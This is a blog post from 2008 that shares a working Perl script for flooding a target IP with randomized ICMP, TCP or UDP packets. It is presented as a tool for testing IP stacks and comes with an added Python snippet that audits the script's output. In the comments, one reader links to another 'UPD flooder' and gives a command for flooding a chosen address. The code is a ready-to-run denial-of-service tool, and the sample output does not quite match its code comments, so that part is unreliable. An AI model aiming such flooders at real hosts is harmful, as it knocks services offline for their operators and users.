04 November 2008

Packet Flooder Script

I considered for a while whether or not to post this here.
Ultimately I decided to go ahead and do it for a couple of reasons:

1. This isn't anything special; there are myriad similar (or better) tools out there that do the same thing.
2. It is actually useful for testing IP stacks on various devices.

And so, here it is: a Perl-based packet flood script.
It's got a few things that make it interesting:

1. Ports are chosen randomly for TCP and UDP.
2. ICMP type codes are chosen randomly.
3. TCP flags are chosen randomly.
4. The fragment bit is un/set randomly.



#!/usr/bin/perl -w
# =================================================
# simple network flooder script
# takes type of flood (icmp, tcp, udp) as param
# optionally takes dest ip and packet count
# =================================================
my $VERSION = 0.5;
# =================================================
use strict;
use Net::RawIP;    # raw sockets: the script has to run as root

# command line: flood type, then optional destination and packet count
my $flood = shift or &usage();
my $dstip = shift || '127.0.0.1';
my $pktct = shift || 100;

&icmpflood($dstip, $pktct) if $flood =~ 'icmp';
&tcpflood($dstip, $pktct) if $flood =~ 'tcp';
&udpflood($dstip, $pktct) if $flood =~ 'udp';

# send $pktct ICMP packets with random type, code and frag_off
sub icmpflood {
    my($dstip, $pktct, $code, $type, $frag);
    $dstip = shift;
    $pktct = shift;

    print "\nstarting flood to $dstip\n";
    # "<" rather than "<=" so that exactly $pktct packets are sent
    for(my $i=0; $i < $pktct; $i++) {

        $code = int(rand(255));    # 0..254
        $type = int(rand(255));    # 0..254
        $frag = int(rand(2));      # 0 or 1

        my $packet = new Net::RawIP({
            ip => {
                daddr => $dstip,
                frag_off => $frag,
            },
            icmp => {
                code => $code,
                type => $type,
            }
        });

        $packet->send;
        print "sent icmp $type->$code, frag: $frag\n";
    }
    print "\nflood complete\n\n";
}

# send $pktct TCP packets with random ports, flags and frag_off
sub tcpflood {
    my($dstip, $pktct, $sport, $dport, $frag, $urg, $psh, $rst, $fin,
       $syn, $ack);
    $dstip = shift;
    $pktct = shift;
    print "\nstarting flood to $dstip\n";
    # "<" rather than "<=" so that exactly $pktct packets are sent
    for(my $i=0; $i < $pktct; $i++) {

        $sport = int(rand(65535));    # 0..65534
        $dport = int(rand(65535));    # 0..65534
        $frag = int(rand(2));
        # each flag is set or cleared independently
        $urg = int(rand(2));
        $psh = int(rand(2));
        $rst = int(rand(2));
        $fin = int(rand(2));
        $syn = int(rand(2));
        $ack = int(rand(2));

        my $packet = new Net::RawIP({
            ip => {
                daddr => $dstip,
                frag_off => $frag,
            },
            tcp => {
                source => $sport,
                dest => $dport,
                urg => $urg,
                psh => $psh,
                rst => $rst,
                fin => $fin,
                syn => $syn,
                ack => $ack,
            }
        });

        $packet->send;
        # the string below contains a literal line break after "psh:";
        # urg is not printed
        print "sent tcp packet from $sport to $dport, frag: $frag, psh:
$psh, rst: $rst, fin: $fin, syn: $syn, ack: $ack\n";
    }
    print "\nflood complete\n\n";
}

# send $pktct UDP packets with random ports and frag_off
sub udpflood {
    my($dstip, $pktct, $sport, $dport, $frag);
    $dstip = shift;
    $pktct = shift;

    print "\nstarting flood to $dstip\n";
    # "<" rather than "<=" so that exactly $pktct packets are sent
    for(my $i=0; $i < $pktct; $i++) {

        $sport = int(rand(255));    # 0..254
        $dport = int(rand(255));    # 0..254
        $frag = int(rand(2));

        my $packet = new Net::RawIP({
            ip => {
                daddr => $dstip,
                frag_off => $frag,
            },
            udp => {
                source => $sport,
                dest => $dport,
            }
        });

        $packet->send;
        print "sent udp packet from $sport to $dport, frag: $frag\n";
    }
    print "\nflood complete\n\n";
}

# print help and exit when no flood type is given
sub usage {
    print "
need to set a valid flood type (one of icmp, tcp, udp)
optionally set dest ip and packetcount

example:

$0 [tcp udp icmp] \n\n";
    exit 0;
}
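
When the script is used to test a device, its TCP output can be audited to see which of the packets it sent carried flag combinations that do not occur in normal TCP traffic, and which a stack or filter under test would therefore be expected to reject. The following is an added example, not part of the original script; the function names are made up for illustration, and the sample records are copied from the output quoted in the comments.

```python
import re

# Five records copied from the output quoted in the comments; the script's
# print statement has a line break after "psh:", so a record spans two lines.
SAMPLE_LOG = """\
sent tcp packet from 63603 to 12185, frag: 0, psh:
0, rst: 1, fin: 0, syn: 0, ack: 1
sent tcp packet from 23985 to 59992, frag: 1, psh:
0, rst: 0, fin: 0, syn: 0, ack: 0
sent tcp packet from 45043 to 48773, frag: 0, psh:
0, rst: 1, fin: 0, syn: 1, ack: 1
sent tcp packet from 27944 to 11086, frag: 0, psh:
1, rst: 0, fin: 1, syn: 1, ack: 1
sent tcp packet from 47445 to 60593, frag: 0, psh:
0, rst: 0, fin: 0, syn: 0, ack: 1
"""

RECORD = re.compile(
    r"sent tcp packet from (\d+) to (\d+), frag: ([01]),\s*psh:\s*([01]),"
    r" rst: ([01]), fin: ([01]), syn: ([01]), ack: ([01])"
)
FIELDS = ("sport", "dport", "frag", "psh", "rst", "fin", "syn", "ack")


def classify(f):
    """Return why a logged flag combination is anomalous; [] means plausible."""
    reasons = []
    if f["syn"] and f["fin"]:
        reasons.append("SYN+FIN")  # opens and closes a connection at once
    if f["syn"] and f["rst"]:
        reasons.append("SYN+RST")  # opens and aborts a connection at once
    if not (f["syn"] or f["rst"] or f["fin"] or f["psh"] or f["ack"]):
        # The script does not log URG, so this means "none of the logged flags".
        reasons.append("no logged flags")
    elif not f["ack"] and (f["fin"] or f["psh"]):
        # After the initial SYN, every normal segment carries ACK.
        reasons.append("FIN/PSH without ACK")
    return reasons


def audit(log):
    """Parse the script's TCP output; return (sport, dport, reasons) per packet."""
    results = []
    for m in RECORD.finditer(log):
        f = dict(zip(FIELDS, map(int, m.groups())))
        results.append((f["sport"], f["dport"], classify(f)))
    return results


if __name__ == "__main__":
    for sport, dport, reasons in audit(SAMPLE_LOG):
        print(sport, dport, ", ".join(reasons) or "plausible")
```

Comparing this list with what the device under test actually accepted or logged shows where its flag validation has gaps.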

7 comments:

  1. don't seem to have Net::RawIP;
    how do i get it?
    (new to perl...)

  2. It has a compilation error :/

  3. To anonymous:
    It depends on quite a few factors. If you're using a Debian-based Linux distro, perhaps the easiest way is to simply run:
    'apt-get install libnet-rawip-perl'.

    On most other systems you can use CPAN like so: perl -MCPAN -e 'install Net::RawIP'.

    To luuckk:
    Sorry it's not working. I need more information to help, but if you're seeing an error similar to the following...
    starting flood to 127.0.0.1
    (rawsock) socket problems [fatal] at /usr/lib/perl5/Net/RawIP.pm line 620.

    ...the problem is that you need to be root in order to use raw sockets on most unix systems. Try running the script as root (e.g. "sudo ./scriptname tcp") and it should work.

  4. go Get SCRIPT perl UPD flooder

    http://www.2shared.com/document/grqFTxb7/9C0pl.html

    command flood : perl 9C0.pl 127.0.0.0 6005 9999

    **************** perl 9C0 (ip)who need to flood + prot and 9999

  5. Hi Jason,

    I've tried running as root as you suggested but I'm still receiving the same error.

    $ sudo perl scriptnamed.pl
    (rawsock) socket problems [fatal] at /usr/lib/perl5/site_perl/5.8.8/x86_64-linux-thread-multi/Net/RawIP.pm line 620.

  6. Hey anon.
    I'm not sure why you're seeing that error. I just copy/pasted the code as I have it above into my system, to see if maybe things have changed in the years since I initially wrote this script. It seems to be working still, at least on perl v5.10.1 using the ubuntu packaged version of libnet-rawip-perl.

    Here's an example of how to run it:
    $ sudo ./packetflood.pl tcp localhost 10

    The options I've specified are:
    * tcp = use tcp flood mode
    * localhost = destination of flood
    * 10 = send 10 packets

    Here's what you should see if it's working:

    starting flood to localhost
    sent tcp packet from 63603 to 12185, frag: 0, psh:
    0, rst: 1, fin: 0, syn: 0, ack: 1
    sent tcp packet from 23985 to 59992, frag: 1, psh:
    0, rst: 0, fin: 0, syn: 0, ack: 0
    sent tcp packet from 45043 to 48773, frag: 0, psh:
    0, rst: 1, fin: 0, syn: 1, ack: 1
    sent tcp packet from 27944 to 11086, frag: 0, psh:
    1, rst: 0, fin: 1, syn: 1, ack: 1
    sent tcp packet from 46149 to 37290, frag: 0, psh:
    1, rst: 1, fin: 0, syn: 1, ack: 0
    sent tcp packet from 47262 to 25355, frag: 0, psh:
    1, rst: 1, fin: 1, syn: 0, ack: 1
    sent tcp packet from 11141 to 44979, frag: 1, psh:
    0, rst: 1, fin: 1, syn: 1, ack: 0
    sent tcp packet from 9606 to 18614, frag: 0, psh:
    0, rst: 0, fin: 0, syn: 1, ack: 1
    sent tcp packet from 47445 to 60593, frag: 0, psh:
    0, rst: 0, fin: 0, syn: 0, ack: 1
    sent tcp packet from 49703 to 37715, frag: 1, psh:
    1, rst: 0, fin: 0, syn: 0, ack: 0
    sent tcp packet from 41685 to 8108, frag: 0, psh:
    1, rst: 1, fin: 1, syn: 1, ack: 1

    flood complete
